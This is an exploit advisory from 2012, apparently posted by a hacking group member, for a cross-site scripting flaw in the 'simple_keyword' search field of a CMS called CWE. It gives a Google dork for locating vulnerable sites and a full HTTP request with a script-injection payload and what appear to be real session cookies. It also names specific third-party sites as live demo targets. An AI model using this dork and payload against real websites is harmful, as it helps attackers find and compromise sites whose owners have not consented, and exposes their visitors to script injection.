<!-- ________ .__ __________________ \_ ___ \_______|__| _____ \_____ \______ \ / \ \/\_ __ \ |/ \ _(__ <| _/ \ \____| | \/ | Y Y \/ \ | \ \______ /|__| |__|__|_| /______ /____|_ / \/ \/ \/ \/ --> # Exploit Title: CWE. cms Cross site Scripting Vulnerability # # Google Dork: Intext:"Powered by CWE." # # Date: 08/29/2012 # # Author: Crim3R # # Site : Http://Ajaxtm.com/ # # Vendor Home : http://www.code-corner.com # # Tested on: all # ================================== simple_keyword in cms.php is Vulnerable to xss HttpHeaders : / Host: cloud1.gdnet.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://cloud1.gdnet.org/cms.php?id=gdn_development_research Cookie: gdnet_tracking=1346311708.894; eSESSION=rdn55lecs4i2mjagi1qd0eikn4; __utma=45678203.95986659.1346311766.1346311766.1346311766.1; __utmb=45678203.1.10.1346311766; Content-Type: application/x-www-form-urlencoded Content-Length: 94 simple_keyword="><script>alert(0);</script>&id=372&submit_simple_search=GO D3m0: http://cloud2.gdnet.org/cms.php?id=gdn_international_organization http://cloud1.gdnet.org/cms.php?id=annual_conference http://www.code-corner.com ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369